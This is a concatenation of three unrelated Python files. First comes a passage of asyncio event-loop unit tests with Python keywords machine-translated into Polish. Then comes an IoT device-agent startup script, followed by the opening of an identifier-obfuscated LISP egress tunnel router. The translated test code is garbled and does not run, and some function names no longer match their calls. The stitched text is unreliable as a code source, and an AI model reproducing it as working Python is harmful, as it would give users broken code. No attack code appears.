fut = asyncio.Future(loop=self.loop)
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception w callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
self.loop._process_events = mock.Mock()
@asyncio.coroutine
def zero_error_coro():
uzyskaj z asyncio.sleep(0.01, loop=self.loop)
1/0
# Test Future.__del__
przy mock.patch('asyncio.base_events.logger') jako log:
fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
fut.add_done_callback(lambda *args: self.loop.stop())
self.loop.run_forever()
fut = Nic # Trigger Future.__del__ albo futures._TracebackLogger
jeżeli PY34:
# Future.__del__ w Python 3.4 logs error with
# an actual exception context
log.error.assert_called_with(
test_utils.MockPattern('.*exception was never retrieved'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
inaczej:
# futures._TracebackLogger logs only textual traceback
log.error.assert_called_with(
test_utils.MockPattern(
'.*exception was never retrieved.*ZeroDiv'),
exc_info=Nieprawda)
def test_set_exc_handler_invalid(self):
przy self.assertRaisesRegex(TypeError, 'A callable object albo Nic'):
self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
def zero_error():
1/0
def run_loop():
handle = self.loop.call_soon(zero_error)
self.loop._run_once()
zwróć handle
self.loop.set_debug(Prawda)
self.loop._process_events = mock.Mock()
mock_handler = mock.Mock()
self.loop.set_exception_handler(mock_handler)
handle = run_loop()
mock_handler.assert_called_with(self.loop, {
'exception': MOCK_ANY,
'message': test_utils.MockPattern(
'Exception w callback.*zero_error'),
'handle': handle,
'source_traceback': handle._source_traceback,
})
mock_handler.reset_mock()
self.loop.set_exception_handler(Nic)
przy mock.patch('asyncio.base_events.logger') jako log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Exception w callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
assert nie mock_handler.called
def test_set_exc_handler_broken(self):
def run_loop():
def zero_error():
1/0
self.loop.call_soon(zero_error)
self.loop._run_once()
def handler(loop, context):
podnieś AttributeError('spam')
self.loop._process_events = mock.Mock()
self.loop.set_exception_handler(handler)
przy mock.patch('asyncio.base_events.logger') jako log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Unhandled error w exception handler'),
exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
_context = Nic
klasa Loop(base_events.BaseEventLoop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
podnieś ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
1/0
loop.call_soon(zero_error)
loop._run_once()
przy mock.patch('asyncio.base_events.logger') jako log:
run_loop()
log.error.assert_called_with(
'Exception w default exception handler',
exc_info=Prawda)
def custom_handler(loop, context):
podnieś ValueError('ham')
_context = Nic
loop.set_exception_handler(custom_handler)
przy mock.patch('asyncio.base_events.logger') jako log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern('Exception w default exception.*'
'dopóki handling.*in custom'),
exc_info=Prawda)
# Check that original context was dalejed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
przy self.assertRaisesRegex(
TypeError, 'task factory must be a callable albo Nic'):
self.loop.set_task_factory(1)
self.assertIsNic(self.loop.get_task_factory())
def test_set_task_factory(self):
self.loop._process_events = mock.Mock()
klasa MyTask(asyncio.Task):
dalej
@asyncio.coroutine
def coro():
dalej
factory = lambda loop, coro: MyTask(coro, loop=loop)
self.assertIsNic(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
self.assertPrawda(isinstance(task, MyTask))
self.loop.run_until_complete(task)
self.loop.set_task_factory(Nic)
self.assertIsNic(self.loop.get_task_factory())
task = self.loop.create_task(coro())
self.assertPrawda(isinstance(task, asyncio.Task))
self.assertNieprawda(isinstance(task, MyTask))
self.loop.run_until_complete(task)
def test_env_var_debug(self):
code = '\n'.join((
'zaimportuj asyncio',
'loop = asyncio.get_event_loop()',
'print(loop.get_debug())'))
# Test przy -E to nie fail jeżeli the unit test was run with
# PYTHONASYNCIODEBUG set to a non-empty string
sts, stdout, stderr = assert_python_ok('-E', '-c', code)
self.assertEqual(stdout.rstrip(), b'Nieprawda')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='')
self.assertEqual(stdout.rstrip(), b'Nieprawda')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='1')
self.assertEqual(stdout.rstrip(), b'Prawda')
sts, stdout, stderr = assert_python_ok('-E', '-c', code,
PYTHONASYNCIODEBUG='1')
self.assertEqual(stdout.rstrip(), b'Nieprawda')
def test_create_task(self):
klasa MyTask(asyncio.Task):
dalej
@asyncio.coroutine
def test():
dalej
klasa EventLoop(base_events.BaseEventLoop):
def create_task(self, coro):
zwróć MyTask(coro, loop=loop)
loop = EventLoop()
self.set_event_loop(loop)
coro = test()
task = asyncio.ensure_future(coro, loop=loop)
self.assertIsInstance(task, MyTask)
# make warnings quiet
task._log_destroy_pending = Nieprawda
coro.close()
def test_run_forever_keyboard_interrupt(self):
# Python issue #22601: ensure that the temporary task created by
# run_forever() consumes the KeyboardInterrupt oraz so don't log
# a warning
@asyncio.coroutine
def podnieś_keyboard_interrupt():
podnieś KeyboardInterrupt
self.loop._process_events = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
spróbuj:
self.loop.run_until_complete(raise_keyboard_interrupt())
wyjąwszy KeyboardInterrupt:
dalej
self.loop.close()
support.gc_collect()
self.assertNieprawda(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
# Python issue #22429: run_until_complete() must nie schedule a pending
# call to stop() jeżeli the future podnieśd a BaseException
@asyncio.coroutine
def podnieś_keyboard_interrupt():
podnieś KeyboardInterrupt
self.loop._process_events = mock.Mock()
spróbuj:
self.loop.run_until_complete(raise_keyboard_interrupt())
wyjąwszy KeyboardInterrupt:
dalej
def func():
self.loop.stop()
func.called = Prawda
func.called = Nieprawda
spróbuj:
self.loop.call_soon(func)
self.loop.run_forever()
wyjąwszy KeyboardInterrupt:
dalej
self.assertPrawda(func.called)
klasa MyProto(asyncio.Protocol):
done = Nic
def __init__(self, create_future=Nieprawda):
self.state = 'INITIAL'
self.nbytes = 0
jeżeli create_future:
self.done = asyncio.Future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state w ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
jeżeli self.done:
self.done.set_result(Nic)
klasa MyDatagramProto(asyncio.DatagramProtocol):
done = Nic
def __init__(self, create_future=Nieprawda):
self.state = 'INITIAL'
self.nbytes = 0
jeżeli create_future:
self.done = asyncio.Future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
jeżeli self.done:
self.done.set_result(Nic)
klasa BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
@mock.patch('asyncio.base_events.socket')
def test_create_connection_multiple_errors(self, m_socket):
klasa MyProto(asyncio.Protocol):
dalej
@asyncio.coroutine
def getaddrinfo(*args, **kw):
uzyskaj z []
zwróć [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
zwróć asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
idx = -1
errors = ['err1', 'err2']
def _socket(*args, **kw):
nonlocal idx, errors
idx += 1
podnieś OSError(errors[idx])
m_socket.socket = _socket
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
przy self.assertRaises(OSError) jako cm:
self.loop.run_until_complete(coro)
self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@mock.patch('asyncio.base_events.socket')
def test_create_connection_timeout(self, m_socket):
# Ensure that the socket jest closed on timeout
sock = mock.Mock()
m_socket.socket.return_value = sock
def getaddrinfo(*args, **kw):
fut = asyncio.Future(loop=self.loop)
addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
('127.0.0.1', 80))
fut.set_result([addr])
zwróć fut
self.loop.getaddrinfo = getaddrinfo
przy mock.patch.object(self.loop, 'sock_connect',
side_effect=asyncio.TimeoutError):
coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
przy self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(coro)
self.assertPrawda(sock.close.called)
def test_create_connection_host_port_sock(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_host_port_sock(self):
coro = self.loop.create_connection(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_getaddrinfo(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
uzyskaj z []
def getaddrinfo_task(*args, **kwds):
zwróć asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
uzyskaj z []
zwróć [(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
zwróć asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
zwróć [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
zwróć asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET)
przy self.assertRaises(OSError):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def test_create_connection_multiple_errors_local_addr(self, m_socket):
def bind(addr):
jeżeli addr[0] == '0.0.0.1':
err = OSError('Err')
err.strerror = 'Err'
podnieś err
m_socket.socket.return_value.bind = bind
@asyncio.coroutine
def getaddrinfo(*args, **kw):
zwróć [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
zwróć asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError('Err2')
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(Nic, 8080))
przy self.assertRaises(OSError) jako cm:
self.loop.run_until_complete(coro)
self.assertPrawda(str(cm.exception).startswith('Multiple exceptions: '))
self.assertPrawda(m_socket.socket.return_value.close.called)
def test_create_connection_no_local_addr(self):
@asyncio.coroutine
def getaddrinfo(host, *args, **kw):
jeżeli host == 'example.com':
zwróć [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
inaczej:
zwróć []
def getaddrinfo_task(*args, **kwds):
zwróć asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(Nic, 8080))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_default(self):
self.loop.getaddrinfo = mock.Mock()
def mock_getaddrinfo(*args, **kwds):
f = asyncio.Future(loop=self.loop)
f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
socket.SOL_TCP, '', ('1.2.3.4', 80))])
zwróć f
self.loop.getaddrinfo.side_effect = mock_getaddrinfo
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.return_value = ()
self.loop._make_ssl_transport = mock.Mock()
klasa _SelectorTransportMock:
_sock = Nic
def get_extra_info(self, key):
zwróć mock.Mock()
def close(self):
self._sock.close()
def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
**kwds):
waiter.set_result(Nic)
transport = _SelectorTransportMock()
transport._sock = sock
zwróć transport
self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
ANY = mock.ANY
# First try the default server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(MyProto, 'python.org', 80, ssl=Prawda)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=Nieprawda,
server_hostname='python.org')
# Next try an explicit server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(MyProto, 'python.org', 80, ssl=Prawda,
server_hostname='perl.com')
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=Nieprawda,
server_hostname='perl.com')
# Finally try an explicit empty server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(MyProto, 'python.org', 80, ssl=Prawda,
server_hostname='')
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(ANY, ANY, ANY, ANY,
server_side=Nieprawda,
server_hostname='')
def test_create_connection_no_ssl_server_hostname_errors(self):
# When nie using ssl, server_hostname must be Nic.
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='python.org')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
# When using ssl, server_hostname may be Nic jeżeli host jest non-empty.
coro = self.loop.create_connection(MyProto, '', 80, ssl=Prawda)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, Nic, 80, ssl=Prawda)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
sock = socket.socket()
coro = self.loop.create_connection(MyProto, Nic, Nic,
ssl=Prawda, sock=sock)
self.addCleanup(sock.close)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_server_empty_host(self):
# jeżeli host jest empty string use Nic instead
host = object()
@asyncio.coroutine
def getaddrinfo(*args, **kw):
nonlocal host
host = args[0]
uzyskaj z []
def getaddrinfo_task(*args, **kwds):
zwróć asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
fut = self.loop.create_server(MyProto, '', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertIsNic(host)
def test_create_server_host_port_sock(self):
fut = self.loop.create_server(
MyProto, '0.0.0.0', 0, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_host_port_sock(self):
fut = self.loop.create_server(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_getaddrinfo(self):
getaddrinfo = self.loop.getaddrinfo = mock.Mock()
getaddrinfo.return_value = []
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, f)
@mock.patch('asyncio.base_events.socket')
def test_create_server_cant_bind(self, m_socket):
klasa Err(OSError):
strerror = 'error'
m_socket.getaddrinfo.return_value = [
(2, 1, 6, '', ('127.0.0.1', 10100))]
m_socket.getaddrinfo._is_coroutine = Nieprawda
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertPrawda(m_sock.close.called)
@mock.patch('asyncio.base_events.socket')
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
m_socket.getaddrinfo.return_value = []
m_socket.getaddrinfo._is_coroutine = Nieprawda
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr='localhost')
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 1, 2, 3))
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_connect_err(self):
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@mock.patch('asyncio.base_events.socket')
def test_create_datagram_endpoint_socket_err(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, local_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 nie supported albo enabled')
def test_create_datagram_endpoint_no_matching_family(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol,
remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
self.assertRaises(
ValueError, self.loop.run_until_complete, coro)
@mock.patch('asyncio.base_events.socket')
def test_create_datagram_endpoint_setblk_err(self, m_socket):
m_socket.socket.return_value.setblocking.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
self.assertPrawda(
m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@mock.patch('asyncio.base_events.socket')
def test_create_datagram_endpoint_cant_bind(self, m_socket):
klasa Err(OSError):
dalej
m_socket.AF_INET6 = socket.AF_INET6
m_socket.getaddrinfo = socket.getaddrinfo
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_datagram_endpoint(
MyDatagramProto,
local_addr=('127.0.0.1', 0), family=socket.AF_INET)
self.assertRaises(Err, self.loop.run_until_complete, fut)
self.assertPrawda(m_sock.close.called)
def test_accept_connection_retry(self):
sock = mock.Mock()
sock.accept.side_effect = BlockingIOError()
self.loop._accept_connection(MyProto, sock)
self.assertNieprawda(sock.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
sock = mock.Mock()
sock.fileno.return_value = 10
sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
self.loop.remove_reader = mock.Mock()
self.loop.call_later = mock.Mock()
self.loop._accept_connection(MyProto, sock)
self.assertPrawda(m_log.error.called)
self.assertNieprawda(sock.close.called)
self.loop.remove_reader.assert_called_with(10)
self.loop.call_later.assert_called_with(constants.ACCEPT_RETRY_DELAY,
# self.loop._start_serving
mock.ANY,
MyProto, sock, Nic, Nic)
def test_call_coroutine(self):
@asyncio.coroutine
def simple_coroutine():
dalej
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
dla func w (coro_func, coro_obj):
przy self.assertRaises(TypeError):
self.loop.call_soon(func)
przy self.assertRaises(TypeError):
self.loop.call_soon_threadsafe(func)
przy self.assertRaises(TypeError):
self.loop.call_later(60, func)
przy self.assertRaises(TypeError):
self.loop.call_at(self.loop.time() + 60, func)
przy self.assertRaises(TypeError):
self.loop.run_in_executor(Nic, func)
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
def stop_loop_cb(loop):
loop.stop()
@asyncio.coroutine
def stop_loop_coro(loop):
uzyskaj z ()
loop.stop()
asyncio.set_event_loop(self.loop)
self.loop.set_debug(Prawda)
self.loop.slow_callback_duration = 0.0
# slow callback
self.loop.call_soon(stop_loop_cb, self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Handle.*stop_loop_cb.*> "
"took .* seconds$")
# slow task
asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Task.*stop_loop_coro.*> "
"took .* seconds$")
jeżeli __name__ == '__main__':
unittest.main()
|
run.py
|
import sys
import logging
from os import path
from os import remove
import requests
import streamingAnalytics.listener
import deviceRegistration.registrationProcess
import API.authentication as auth
import API.identity
import time
import threading
import utils.settings
import dockerWatcher.sendDockerStats
import streamingAnalytics.sendModelStats
import utils.threadCommunication as communication
import deviceStatus.sendDeviceStats
import streamingAnalytics.modelSync
import paho.mqtt.publish as publish
import deviceControl.smartRest
import deviceControl.operationsListener
logger = logging.getLogger('deviceAgent')
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger.info('Logger for deviceAgent was initialised')
def checkUsabilityCredentials():
logger.info('Cecking if available credentials work')
url = "https://%s/user/currentUser"%(auth.get().tenant)
logger.debug('Requesting the following url: ' + str(url))
response = requests.request("GET", url, headers=auth.get().headers)
logger.debug('Response from request with code : ' + str(response.status_code))
if response.status_code == 200:
logger.info('Credentials valid')
return True
else:
logger.info('Deleting Credential File')
remove("./config/credentials.key")
return False
def start():
logger.info('Checking for credentials')
if not path.exists('./config/credentials.key'):
logger.info('No credentials found, starting registration')
deviceRegistration.registrationProcess.start()
logger.info('Credentials available')
logger.info('Starting checking of existing device')
if API.identity.getInternalID(utils.settings.basics()['deviceID']) is False:
logger.info('No device found in c8y, starting edge device creation.')
deviceRegistration.newDeviceRegistration.createEdgeDevice(utils.settings.basics()['deviceID'])
auth.get().internalID = API.identity.getInternalID(utils.settings.basics()['deviceID'])
utils.settings.device()
deviceControl.smartRest.checkSmartRestTemplateExists()
streamingAnalytics.modelSync.models()
logger.info('Sending internalID on MQTT for APAMA standalone')
try:
publish.single("settings/internalID", str(auth.get().internalID), hostname=utils.settings.mqtt()['broker'], port=int(utils.settings.mqtt()['port']))
except:
logger.warning('No MQTT Broker yet available')
logger.info('Finishing start sequency')
def operation():
logger.info('Starting operationsWatcher')
threadOperatiosnWatcher = threading.Thread(target=deviceControl.operationsListener.start, daemon=True)
threadOperatiosnWatcher.start()
return threadOperatiosnWatcher
def listener():
logger.info('Starting listener')
threadMQTTListener = threading.Thread(target=streamingAnalytics.listener.start, daemon=True)
threadMQTTListener.start()
return threadMQTTListener
def dockerStatus():
logger.info('Starting Docker Status')
threadDockerStatus = threading.Thread(target=dockerWatcher.sendDockerStats.start, daemon=True)
threadDockerStatus.start()
return threadDockerStatus
def modelStatus():
logger.info('Starting Model Status')
threadModelStatus = threading.Thread(target=streamingAnalytics.sendModelStats.start, daemon=True)
threadModelStatus.start()
return threadModelStatus
def deviceStatsStatus():
logger.info('Starting Device Status')
threadDeviceStatus = threading.Thread(target=deviceStatus.sendDeviceStats.start, daemon=True)
threadDeviceStatus.start()
return threadDeviceStatus
if __name__== "__main__":
try:
start()
statusDevice = deviceStatsStatus()
statusOperation = operation()
statusListener = listener()
statusDocker = dockerStatus()
statusModel = modelStatus()
while True:
time.sleep(1)
print("Heartbeat")
if statusListener.is_alive() is False:
logger.error('Listener on Measurements not alive, restarting')
time.sleep(5)
statusListerner = listener()
if statusOperation.is_alive() is False:
logger.error('Listener on operations not alive, restarting')
time.sleep(5)
statusOperation = operation()
elif statusDocker.is_alive() is False:
logger.error('Status on Docker not alive, restarting')
time.sleep(5)
statusDocker = dockerStatus()
elif statusModel.is_alive() is False:
logger.error('Status on Model not alive, restarting')
time.sleep(5)
statusModel = modelStatus()
elif statusDevice.is_alive() is False:
logger.error('Status on device update not alive, restarting')
time.sleep(5)
statusDevice = deviceStatsStatus()
except KeyboardInterrupt:
sys.exit(1)
except Exception as e:
logger.error('The following error occured: ' + str(e))
pass
|
lisp-etr.py
|
#-----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-etr.py
#
# This file performs LISP Egress Tunnel Router (ETR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
from future import standard_library
standard_library . install_aliases ( )
from builtins import str
import lisp
import lispconfig
import socket
import select
import threading
import time
import struct
from subprocess import getoutput
import os
try :
import pytun
except :
pytun = None
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
if 30 - 30: o0oOOo0O0Ooo - O0 % o0oOOo0O0Ooo - OoooooooOO * O0 * OoooooooOO
Oo0o = None
OOO0o0o = None
Ii1iI = None
Oo = None
I1Ii11I1Ii1i = lisp . lisp_get_ephemeral_port ( )
Ooo = None
o0oOoO00o = [ None , None , None ]
i1 = None
oOOoo00O0O = None
i1111 = None
if 22 - 22: Ii1I . IiII
I11 = 60
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
if 58 - 58: i11iIiiIii % I1Ii111
O0OoOoo00o = ( os . getenv ( "LISP_ETR_TEST_MODE" ) != None )
iiiI11 = False
if 91 - 91: o0oOOo0O0Ooo / II111iiii . I1ii11iIi11i + OOooOOo
if 47 - 47: OoOoOO00 / Ii1I * OoooooooOO
if 9 - 9: I1IiiI - Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
def OoooooOoo ( kv_pair ) :
global OOO0o0o
global Ii1iI
if 70 - 70: OoO0O00 . OoO0O00 - OoO0O00 / I1ii11iIi11i * OOooOOo
OoO000 = lispconfig . lisp_map_server_command ( kv_pair )
if 42 - 42: oO0o - i1IIi / i11iIiiIii + OOooOOo + OoO0O00
if 17 - 17: oO0o . Oo0Ooo . I1ii11iIi11i
if 3 - 3: OoOoOO00 . Oo0Ooo . I1IiiI / Ii1I
if 38 - 38: II111iiii % i11iIiiIii . ooOoO0o - OOooOOo + Ii1I
if 66 - 66: OoooooooOO * OoooooooOO . OOooOOo . i1IIi - OOooOOo
o0o00ooo0 = ( len ( lisp . lisp_map_servers_list ) == 1 )
if ( o0o00ooo0 ) :
OoO000 = list ( lisp . lisp_map_servers_list . values ( ) ) [ 0 ]
Ii1iI = threading . Timer ( 2 , oo0Oo00Oo0 ,
[ OoO000 . map_server ] )
Ii1iI . start ( )
else :
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if ( lisp . lisp_nat_traversal ) : return
if ( OoO000 and len ( lisp . lisp_db_list ) > 0 ) :
i1iiI11I ( o0oOoO00o , None , None , OoO000 , False )
